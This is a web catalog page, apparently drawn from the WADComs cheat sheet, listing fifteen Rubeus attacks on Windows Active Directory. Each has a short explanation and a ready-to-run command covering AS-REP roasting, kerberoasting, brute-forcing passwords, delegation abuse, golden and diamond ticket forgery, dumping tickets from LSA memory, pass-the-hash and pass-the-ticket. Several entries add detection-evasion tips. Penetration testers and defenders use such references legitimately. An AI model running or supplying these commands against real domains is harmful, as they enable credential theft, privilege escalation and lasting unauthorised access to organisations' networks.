Catalog WADComs

WAD · Tool

Rubeus

15 techniques Windows · ActiveDirectoryWADComs GPL-3.0

Rubeus-ASREPRoast

ExecutionPrivilege Escalation WindowsActiveDirectory

Rubeus' `asreproast` module will attempt to harvest the non-preauth AS_REP responses for a given list of usernames. These responses will be encrypted with the user's password, which can then be cracked offline. The following command is run on a Windows machine in the victim domain. Command Reference: Output File: hashes.txt

Rubeus.exe asreproast /format:hashcat /outfile:hashes.txt
Native
Exploitation, PrivEsc
Requires
Shell
Services
Kerberos

Rubeus-AskTGT

Execution WindowsActiveDirectory

Rubeus' `asktgt` module uses a valid user's NTLM hash to request Kerberos tickets, in order to access any service or machine where that user has permissions. Command Reference: Domain: test.local Username: john Hash: 2a3de7fe356ee524cc9f3d579f2e0aa7

Rubeus.exe asktgt /domain:test.local /user:john /rc4:2a3de7fe356ee524cc9f3d579f2e0aa7 /ptt
Native
Exploitation
Requires
Hash, Username
Services
Kerberos

Rubeus-Brute

Enumeration WindowsActiveDirectory

Rubeus' `brute` module bruteforces and enumerates valid Active Directory accounts through Kerberos Pre-Authentication. The following command will attempt to brute force valid username and passwords logins given a list of usernames and a list of passwords. Command Reference: Domain: test.local Username List: usernames.txt Password List: passwords.txt Output File: found_passwords.txt

Rubeus.exe /users:usernames.txt /passwords:passwords.txt /domain:test.local /outfile:found_passwords.txt
Native
Enumeration
Requires
No_Creds
Services
Kerberos

Rubeus-Kerberoast

ExecutionPrivilege Escalation WindowsActiveDirectory

Rubeus' `kerberoast` module will attempt to fetch Service Principal Names that are associated with normal user accounts. What is returned is a ticket that is encrypted with the user account's password, which can then be bruteforced offline. The following command is run on a Windows machine in the victim domain. Command Reference: Output File: hashes.txt

Rubeus.exe kerberoast /outfile:hashes.txt
Native
Exploitation, PrivEsc
Requires
Shell
Services
Kerberos

Rubeus-s4u

ExecutionLateral Movement WindowsActiveDirectory

Rubeus' `s4u` module performs Kerberos constrained delegation attacks using the S4U2Self and S4U2Proxy. This technique abuses accounts configured with delegation privileges (msDS-AllowedToDelegateTo) to impersonate any domain user and further alter the service specified since SPNs are stored in plaintext and thus access any service on the target system as any user Command Reference: Domain: test.local SPN: time/dc.test.local alternative service: ldap(can chose any valid services such as HTTP for remoting access) Username: john$ Hash: 2a3de7fe356ee524cc9f3d579f2e0aa7

Rubeus.exe s4u /user:john$ /aes256:2a3de7fe356ee524cc9f3d579f2e0aa7 /impersonateuser:Administrator /msdsspn:time/dc.test.local /altservice:ldap /ptt
Native
Exploitation, Lateral Movement, Privilidge Escalation
Requires
Hash, Username, target, service
Services
Kerberos

Rubeus-Describe

NEW
Discovery WindowsActiveDirectory

Rubeus describe parses a ticket (TGT or service ticket) and prints its metadata: user, realm, service name, encryption type, flags, start/end/renew-till times and the session key. It does not touch the network, making it a safe way to inspect captured or forged tickets before use. Supplying a service/krbtgt key allows it to also decrypt and display the embedded PAC. Command Reference: Ticket file: ticket.kirbi

# Parse and describe a ticket offline
Rubeus.exe describe /ticket:ticket.kirbi
Native
Discovery
Requires
TGT
Services
Kerberos

Rubeus-DiamondTicket

NEW
PersistenceDefense EvasionExecution WindowsActiveDirectory

Rubeus diamond forges a diamond ticket by requesting a real TGT for a valid account, decrypting it with the krbtgt key, modifying the embedded PAC (user, RID, groups, extra SIDs) and re-encrypting it. Unlike a golden ticket it is derived from a legitimate KDC-issued TGT, so its metadata is internally consistent and far harder to distinguish from genuine tickets. Requires valid credentials for the request plus the krbtgt AES/NT key to re-sign the PAC. Command Reference: Username: john Password: password123 AES256 krbtgt key: 5db474e563f34e4bb62e04eecd4a6f92 Domain: test.local

# Forge a diamond TGT: request a real TGT as 'john', then re-sign the PAC as administrator (RID 500).
# /krbkey is the krbtgt AES256 key.
Rubeus.exe diamond /creduser:john /credpassword:password123 /krbkey:5db474e563f34e4bb62e04eecd4a6f92 /ticketuser:administrator /ticketuserid:500 /groups:512 /nowrap
Native
Persistence, Defense Evasion, Exploitation
Requires
AES_Key, Username, Password
Services
Kerberos

Rubeus-Dump

NEW
Credential Access WindowsActiveDirectory

Rubeus dump extracts Kerberos tickets from LSA memory. When elevated it dumps tickets for every logon session on the host; unelevated it returns only the current user's tickets. Filters let you target a specific service (e.g. krbtgt for TGTs) or LUID, and /nowrap keeps the base64 on a single line for easy copy-out and reuse via ptt. Command Reference: Service filter: krbtgt

# Dump all TGTs from LSA (elevated dumps every session)
Rubeus.exe dump /service:krbtgt /nowrap
Native
Credential Access
MITRE
T1558
Requires
Shell
Services
Kerberos

Rubeus-GoldenTicket-AES

NEW
PersistenceExecution WindowsActiveDirectory

Rubeus golden forges a TGT signed with the domain krbtgt key, granting arbitrary identity and group membership across the domain until the krbtgt password is rotated twice. Supplying the krbtgt AES256 key with /aes256 produces an AES-encrypted ticket, avoiding the RC4 golden tickets that modern detections flag. Requires the krbtgt key, the domain SID, and typically privileged access to have obtained the key via DCSync. Command Reference: AES256 key: 5db474e563f34e4bb62e04eecd4a6f92 Username: administrator Domain: test.local Domain SID: S-1-5-21-1339291983-1349129144-367733775

# Forge an AES256 golden ticket for the built-in administrator (RID 500)
Rubeus.exe golden /aes256:5db474e563f34e4bb62e04eecd4a6f92 /user:administrator /id:500 /domain:test.local /sid:S-1-5-21-1339291983-1349129144-367733775 /nowrap
Native
Persistence, Exploitation
Requires
AES_Key
Services
Kerberos

Rubeus-Harvest

NEW
Credential AccessCollectionPersistence WindowsActiveDirectory

Rubeus harvest monitors for new TGTs and automatically renews them before they expire, keeping a working cache of live tickets that can be extracted and reused. It combines the monitor behavior with auto-renewal, which is valuable during long engagements to avoid losing captured tickets to the default 10-hour lifetime. Elevation is required to harvest tickets for all logon sessions. Command Reference: Monitor interval: 30 seconds

# Harvest TGTs every 30s and auto-renew them up to their renew-till limit
Rubeus.exe harvest /interval:30 /nowrap
Native
Credential Access, Collection, Persistence
MITRE
T1558
Requires
Shell
Services
Kerberos

Rubeus-Monitor

NEW
Credential AccessCollection WindowsActiveDirectory

Rubeus monitor continuously watches for new Kerberos TGTs as users authenticate to the host, printing any captured tickets on a fixed interval. It is most useful on servers where privileged accounts or delegation targets log on, letting an operator harvest fresh TGTs for pass-the-ticket. Requires an elevated context to see tickets for other logon sessions. Command Reference: Username: john

# Poll every 5 seconds for newly captured TGTs, filtered to one user
Rubeus.exe monitor /interval:5 /filteruser:john /nowrap
Native
Credential Access, Collection
MITRE
T1558
Requires
Shell
Services
Kerberos

Rubeus-OverPassTheHash

NEW
Lateral MovementCredential Access WindowsActiveDirectory

Over-pass-the-hash (pass-the-key) uses a captured AES or NT key to request a legitimate TGT for that user directly from the KDC, converting a stolen key into full Kerberos access without ever knowing the plaintext password. Using the AES256 key with /aes256 avoids the RC4 (etype 23) downgrade that mature environments alert on, making it more OPSEC-safe than /rc4. The /ptt flag injects the resulting TGT for immediate lateral movement. Command Reference: Username: john AES256 key: 5db474e563f34e4bb62e04eecd4a6f92 Domain: test.local Domain Controller host: dc.test.local

# Over-pass-the-hash: turn an AES256 key into a live TGT and inject it
Rubeus.exe asktgt /user:john /aes256:5db474e563f34e4bb62e04eecd4a6f92 /domain:test.local /dc:dc.test.local /ptt /nowrap
Native
Lateral Movement, Credential Access
Requires
AES_Key, Username
Services
Kerberos

Rubeus-Ptt

NEW
Lateral MovementDefense Evasion WindowsActiveDirectory

Rubeus ptt performs a pass-the-ticket by submitting a base64 or .kirbi ticket into the current logon session (or a target LUID when elevated). Once injected the ticket is used transparently by Windows for Kerberos authentication to remote services such as SMB, LDAP or WinRM. Use it after obtaining a TGT/TGS via tgtdeleg, dump, monitor, kerberoast/s4u, or Impacket ticketConverter output. Command Reference: Ticket file: ticket.kirbi

# Inject a .kirbi ticket into the current session
Rubeus.exe ptt /ticket:ticket.kirbi

# Or target a specific logon session by LUID (requires elevation)
Rubeus.exe ptt /ticket:ticket.kirbi /luid:0x3e7
Native
Lateral Movement, Defense Evasion
Requires
TGT
Services
Kerberos, SMB, LDAP

Rubeus-Renew

NEW
PersistenceCredential Access WindowsActiveDirectory

Rubeus renew submits a renewal request for an existing TGT to the KDC, returning a fresh ticket with an extended validity window. It accepts either a base64 blob or a .kirbi file and can auto-renew repeatedly up to the ticket's renew-till limit, which helps maintain access without re-authenticating. Combine with /ptt to inject the renewed ticket into the current session. Command Reference: Domain Controller host: dc.test.local

# Renew a TGT from a .kirbi file and inject it, auto-renewing to the renew-till limit
Rubeus.exe renew /ticket:ticket.kirbi /dc:dc.test.local /autorenew /ptt /nowrap
Native
Persistence, Credential Access
Requires
TGT
Services
Kerberos

Rubeus-TgtDeleg

NEW
Credential Access WindowsActiveDirectory

Rubeus tgtdeleg abuses the Kerberos GSS-API delegation mechanism to obtain a usable TGT (including its session key) for the current user context without requiring local administrator rights. It requests a service ticket for a target SPN with the delegation flag set, then extracts the forwarded TGT that the KDC embeds, yielding a .kirbi that can be passed to another host. Use it for pass-the-ticket from an unprivileged foothold when you cannot dump LSASS. Command Reference: Domain Controller host: dc.test.local

# Extract a usable TGT (.kirbi + session key) for the current user, no elevation needed
Rubeus.exe tgtdeleg /nowrap
Native
Credential Access
Requires
Shell
Services
Kerberos